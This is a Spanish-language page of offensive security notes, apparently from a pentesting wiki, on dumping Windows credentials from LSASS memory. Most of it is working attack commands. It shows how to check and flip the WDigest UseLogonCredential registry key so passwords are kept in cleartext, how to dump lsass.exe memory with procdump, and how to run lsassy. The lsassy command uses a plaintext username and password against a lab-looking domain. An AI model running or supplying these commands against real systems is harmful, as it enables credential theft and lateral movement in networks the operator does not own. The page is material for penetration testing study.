Volcado de Credenciales en Memoria

Verificar si las credenciales se estan guardando en memoria:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

El Servicio de subsistema de autoridad de seguridad local (LSASS) maneja la aplicación de la política de seguridad en un host de Windows. En entornos Windows desde 2000 hasta Server 2008, la memoria del proceso LSASS almacenaba contraseñas en texto sin cifrar para admitir la autenticación WDigest y SSP. Por lo tanto, herramientas como Mimikatz podrían recuperar la contraseña fácilmente.

procdump.exe -accepteula -ma lsass.exe lsass.dmp 2>&1

NOTA : (No solo se guardan) Tambien si el Windows es mayor a 2008 dependen de un registro

Registros para cambiar el almacenamiento en texto claro

cambiar a texto claro:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Hacerlo seguro:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)

Lsasy

lsassy -u student30 -p tm5RpAuHXM7Ew7kC -d dollarcorp.moneycorp.local 172.16.4.101 --users

PreviousVolcado de Credenciales en Navegadores NextEscalacion por grupos de Dominio

Last updated 2 years ago

hashtagRegistros para cambiar el almacenamiento en texto claro

hashtagLsasy

Registros para cambiar el almacenamiento en texto claro

Lsasy